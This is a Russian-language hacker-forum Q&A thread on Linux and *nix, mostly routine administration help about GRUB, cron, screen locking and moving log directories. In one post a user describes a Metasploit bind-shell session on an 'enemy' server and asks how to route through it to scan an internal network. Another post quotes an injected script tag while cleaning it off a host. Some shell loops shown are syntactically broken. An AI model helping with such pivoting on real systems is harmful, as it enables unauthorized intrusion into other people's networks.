*nix. Задай вопрос - получи ответ

Discussion in 'Linux, Freebsd, *nix' started by Xszz, 10 Jan 2008.

  1. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    http://www.xakep.ru/post/49508/default.asp

    Попробуй способы изложенные тут.
     
    _________________________
  2. tyler65

    tyler65 New Member

    Joined:
    27 Nov 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Есть вражеский сервант на линуксе. Открываю для подключения порт, например 7777.
    Подключаюсь метасплоитом.
    Код:
    use multi/handler
    set payload windows/shell_bind_tcp
    set RHOST х.х.х.х
    exploit -z
    Появляется сессия.
    Этот сервер подключен кроме инета к внутренней сети 10.0.0.0/8
    Мне нужно добавить маршрут через это соединение чтобы просканировать сеть.
    Но маршрут не добавляется.
    Код:
    route add 10.0.0.0 255.0.0.0 1
    Invalid gateway specified.
    sessions -l
    1 shell linux
    В чем может быть дело?
     
  3. ~Lexx~

    ~Lexx~ Elder - Старейшина

    Joined:
    30 Sep 2006
    Messages:
    195
    Likes Received:
    28
    Reputations:
    0
    ip r add 10.0.0.0/8 dev ppp0 via xxx.xxx.xxx.xxx(public ip сервера)
     
  4. ernet

    ernet New Member

    Joined:
    26 Aug 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    bt5 и win7 (как сделать чтобы в boot menu при старте пк, win7 грузилась первой? )

    добрый вечер.

    на пк загружен bt5 i win7 как сделать чтобы в boot menu при старте пк, win7 грузилась первой?

    спасибо!
     
  5. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,133
    Likes Received:
    73
    Reputations:
    34
    подскажите как пожалста по такому вопросу-
    как убрать блокировку системы в убунту?т.е вот сидиш серфаеш себе,побежал покурить-вернулся,все экран заблокирован и надо ввводить пароль-а это надоедает!как убрать это фигню/?
     
  6. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    System > Preferences > Screensaver , снимай галку Lock screen when screensaver active.
     
  7. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    в /boot/grub/menu.lst нужо изменить параметр default.
    Допустим, у тебя системы прописаны в таком порядке:

    Gentoo Linux
    BT 5
    Win7

    Для того, чтобы венда бутилась первой, выставляем default=2. Соотвественно для "BT 5" будет 1, а для Gentoo - 0.
     
  8. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,133
    Likes Received:
    73
    Reputations:
    34
    епонский магнитофон :mad: :mad: я там все перерывал а этого и не заметил! :( спасибо помогло!
    ПыСы еще есть вопросик-можно как то устанавливать сразу несколько программ ну попорядку!надо так шоб например ввел команду и она из той папки сама поставила все проги шо в ней находяться? :confused: или это ток надо скрипт писать?
     
  9. ernet

    ernet New Member

    Joined:
    26 Aug 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    спасибо все получилось! :)
     
    #1809 ernet, 1 Nov 2011
    Last edited: 2 Nov 2011
  10. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Эм. Не очень понял вопроса. У тебя пачка .deb пакетов в директории чтоли? тогда вот:
    cd /direcotry_with_soft/;for i in `ls -la *.deb`;do dpkg -i $i;done
     
  11. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Параметр GRUB_DEFAULT - вот его и меняй. Туда надо вставить правильную цифру - посмотри при загрузке, какой по порядку идёт винда, и выставляй значение меньшее на 1 (ну то есть если винда по счёту четврётой идёт - то у тебя будет GRUB_DEFAULT=3). И потом от рута не забудь пустить команду update-grub.
     
  12. ernet

    ernet New Member

    Joined:
    26 Aug 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    yesday

    спасибо все получилось :)
     
  13. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,133
    Likes Received:
    73
    Reputations:
    34
    нет там не дэб пакеты!
    вообщем ситуация такая-с бэктрэка утянул весь софт шо лежит в папке "пентест"и скинул все это дело себе в убунту (папка пентест уже была там давно)и вот софт который скинул не работает и в каждой папке с софтом есть текстовик который устанавливает прогу через терминал и вот я хо што бы как то так указать на папку пентест путь и шоб оно само все мейк инсталы установила а то софта очень много руками каждый проклацывать... :(
     
  14. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Что за текстовик? Скрипт установочный чтоль?
    Если да - то по аналогии:
    cd pentest; for i in `ls -1 ./`;cd $i;./install.sh;done;
    Ну или если там make;make install нужно делать - то же самое:
    cd pentest; for i in `ls -1 ./`;cd $i;./configure && make && make install;done;
    Но устанавливать в таком режиме всё подряд - глупость ИМХО, выбери только то что тебе нужно и вдумчиво поставь.
     
    1 person likes this.
  15. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,133
    Likes Received:
    73
    Reputations:
    34
    я хочу все поставить шоб начать изучать тот софт который присутствует в БТ!ну я согласен что там много не нужного!проблема решена команда твоя помогла ну не на все папки шо были ну как раз тошо мне надо оно все поставило! :) :rolleyes:
     
  16. НTL

    НTL Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    715
    Likes Received:
    205
    Reputations:
    -26
    1) Как остановить скрипт запущенный через cron командой:
    2) После редактирования файла crontab требуется перезагрузка какой нибудь службы для принятие изменений?
     
  17. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    1) ps + kill
    2) если правка была через crontab -e, ничего не нужно делать; если редактором, то запустите вдогонку команду типа crontab -u user /etc/crontab. Для контроля - crontab -l
     
  18. НTL

    НTL Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    715
    Likes Received:
    205
    Reputations:
    -26
    Как изменить папку с логами с /var/log на /home/log ? (Это другой раздел, там места больше)
    Есть идея создать ссылку. Но нет уверенности что это сработает.
     
  19. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    Задача найти все файлы на хостинге с инъекцией и удалить ее. Написал простой баш скрипт, но почему-то он просто затирает весь файл с найденной строкой. Что я делаю не так?
    Code:
    #!/bin/bash
    
    for file in $(grep -r 'newway' ./ | cut -d: -f1)
    do
      $(sed "s#<script type=\"text/javascript\" src='http://newway.su/wp-includes/js/jquery.js'></script>##g" $file > $file)
    done
    
    UPD Решение найдено нужно было использовать ключ -i
    Code:
    #!/bin/bash
    
    for file in $(grep -r "<script type=\"text/javascript\" src='http://newway.su/wp-includes/js/jquery.js'></script>" ./ | cut -d: -f1)
    do
      echo $file
      $(sed -i -e "s#<script type=\"text/javascript\" src='http://newway.su/wp-includes/js/jquery.js'></script>##g" $file)
    done
    
     
    #1819 Fuckel, 13 Dec 2011
    Last edited: 13 Dec 2011
  20. yesday

    yesday New Member

    Joined:
    30 Oct 2011
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Ссылки достаточно в большинстве случаев:
    Code:
    mv /var/log/ /home/.log/ && ln -s /home/.log /var/log && service syslogd restart
    Можно ещё так:
    Code:
    mv /var/log /home/.log; mkdir /var/log;mount -o bind /home/.log /var/log
    (ну и не забыть в fstab прописать монтирование диры)
     
    #1820 yesday, 16 Dec 2011
    Last edited: 16 Dec 2011
Loading...